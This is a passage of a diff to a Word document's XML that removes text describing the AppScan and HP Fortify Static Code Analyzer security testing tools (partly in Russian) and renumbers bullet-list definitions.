-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Customizable scanning policies: Appscan comes with a set of defined scanning policies. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>You can customize the policies to suit your needs.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Tools support: It has tools like Authentication Tester, Token Analyzer, and HTTP Request Editor which comes in handy when testing for vulnerabilities manually.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Support for Ajax and dojo frameworks.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26758,37 +27099,23 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HP Fortify Static Code Analyzer</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26801,466 +27128,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">HP Fortify Static Code Analyzer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>поддерживает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>большое</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>число</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>языков</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>программирования</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>платформ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>включая</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>веб</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>приложения</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>написанные</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> PHP, Python, Java/JSP, ASP.Net </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JavaScript, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>встраиваемый</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>код</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>языках</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ABAP (SAP), Action Script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> VBScript.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30493,6 +30360,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="8">
+    <w:nsid w:val="57C26945"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="297E440E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -30605,7 +30585,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9">
+  <w:abstractNum w:abstractNumId="10">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -30718,7 +30698,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10">
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="6E2B310E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -30831,7 +30811,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11">
+  <w:abstractNum w:abstractNumId="12">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -30948,16 +30928,16 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="7"/>
@@ -30975,10 +30955,13 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="13">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>
@@ -32035,7 +32018,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
